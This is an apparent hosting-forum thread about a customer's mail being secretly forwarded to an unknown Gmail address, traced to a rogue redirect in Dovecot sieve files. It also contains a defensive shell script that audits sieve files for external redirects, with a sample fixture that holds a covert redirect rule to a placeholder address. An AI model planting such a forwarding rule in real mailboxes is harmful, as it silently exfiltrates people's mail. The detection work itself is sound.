Solved: Incoming mails automatically forwarded to Gmail

Active8 (Verified User, joined Jul 13, 2013)
I have a customer whose received mail all automatically gets forwarded to an unknown Gmail address.
There is no forwarder set up in DA and all the passwords have been reset, but the forwarding still happens.

1. The sender in the screenshot is a mail that is received but immediately forwarded to the Gmail account in the screenshot.
2. It is only this customer who has the problem.
3. No forwarder is set up.

Any idea?
 

Attachments: Schermafbeelding 2022-06-03 230519.png
Just to make sure, what is in:

/etc/virtual/%domain%/aliases

or

grep [email protected] /etc/virtual/%domain%/aliases

or in the filter file

/etc/virtual/%domain%/filter

or

grep [email protected] /etc/virtual/%domain%/filter

or just:

grep -lr [email protected] /etc

and for good measure, is this email address anywhere in the account's home directory? Although I don't think DirectAdmin has anything mail related in here.

grep -lr [email protected] /home/$(grep "^%domain%: " /etc/virtual/domainowners | cut -d ":" -f 2 | sed s/[[:space:]]*//g)
 
@sparek thank you for the reply on this late night.
Unfortunately none of those commands or greps returned any value; I had already looked at those directories and files but no luck.

BUT, the last command found forwards here:
/home/user/imap/user.nl/info/.dovecot.svbin
/home/user/imap/user.nl/info/sieve/managesieve.sieve
/home/user/imap/user.nl/info/.dovecot.lda-dupes

I have deleted the references inside those files and that did the trick :)
This is a cPanel customer that we migrated, but we never saw this at that time.

The reason we saw it now was because I was running through the logs and found many forwards that caught my attention.

Thank you very much and have a nice weekend!
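The grep checks suggested above and the sieve files found in this reply point to one thing worth automating: scanning every account's sieve scripts for redirect actions that send mail off-server. The script below is an added example, not code from the thread or from DirectAdmin; it assumes the /home/<user>/imap/<domain>/<account>/sieve/ layout shown in this reply and takes a regex of domains you consider local so that internal redirects are not reported.

```shell
#!/bin/sh
# Added example, not from the thread: audit Dovecot/Pigeonhole sieve scripts
# for "redirect" actions that copy mail off-server. The path layout follows
# the one found in the thread (/home/<user>/imap/<domain>/<account>/sieve/);
# the .dovecot.svbin next to it is only the compiled copy of the same script.

# Print "script|target" for every redirect whose target domain does not
# match the regex in $2 (domains you consider local). $1 is the scan root.
audit_sieve_redirects() {
    scan_root="${1:-/home}"
    local_re="${2:-^$}"    # default matches nothing, so every redirect is reported
    find "$scan_root" -path '*/imap/*/sieve/*.sieve' -type f 2>/dev/null |
    while IFS= read -r script; do
        # Matches both  redirect "addr";  and  redirect :copy "addr";
        grep -oE 'redirect[[:space:]]+(:[a-z]+[[:space:]]+)*"[^"]+"' "$script" |
        sed -E 's/.*"([^"]+)".*/\1/' |
        while IFS= read -r target; do
            domain="${target##*@}"
            if ! printf '%s\n' "$domain" | grep -Eq "$local_re"; then
                printf '%s|%s\n' "$script" "$target"
            fi
        done
    done
}

# Constructed sample tree (no real account): one external redirect of the
# kind described in the thread, one internal redirect, one harmless fileinto.
make_sample_tree() {
    sample_root="$(mktemp -d)"
    sieve_dir="$sample_root/user/imap/user.nl/info/sieve"
    mkdir -p "$sieve_dir"
    cat > "$sieve_dir/managesieve.sieve" <<'EOF'
require ["copy", "fileinto"];
# silently copies every incoming message to an outside mailbox
redirect :copy "PLACEHOLDER-unknown-address@gmail.com";
if header :contains "subject" "ticket" {
    redirect "helpdesk@user.nl";
}
fileinto "INBOX";
EOF
    printf '%s\n' "$sample_root"
}

# Example run:  r=$(make_sample_tree); audit_sieve_redirects "$r" '^user\.nl$'
# prints  <r>/user/imap/user.nl/info/sieve/managesieve.sieve|PLACEHOLDER-unknown-address@gmail.com
```

On a live server, run it as `audit_sieve_redirects /home '^(user\.nl|otherdomain\.tld)$'` and review every reported line; a redirect to a domain nobody recognises is the same symptom this thread describes.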
 
I wasn't sure if DirectAdmin had email-user level filters or not. I guess they do.

Yea, this used to be a ... minor-moderate? problem a few years ago. Accounts would get compromised and the nefarious compromiser would set a filter to forward mail for email accounts to another email address. The owner of the compromised account would be none the wiser, except now all of their incoming email was being sent to another email address.

Of course the root cause of the compromise - the account owner's password being compromised - was still the issue. How was the password compromised? Nobody knows. Account owner probably either had a weak password or ... more likely... had/has a keylogger or malware trojan running on their computer that's either reading their browser's password locker or capturing keystrokes. Not really anything a web hosting company can do to defend against that.
 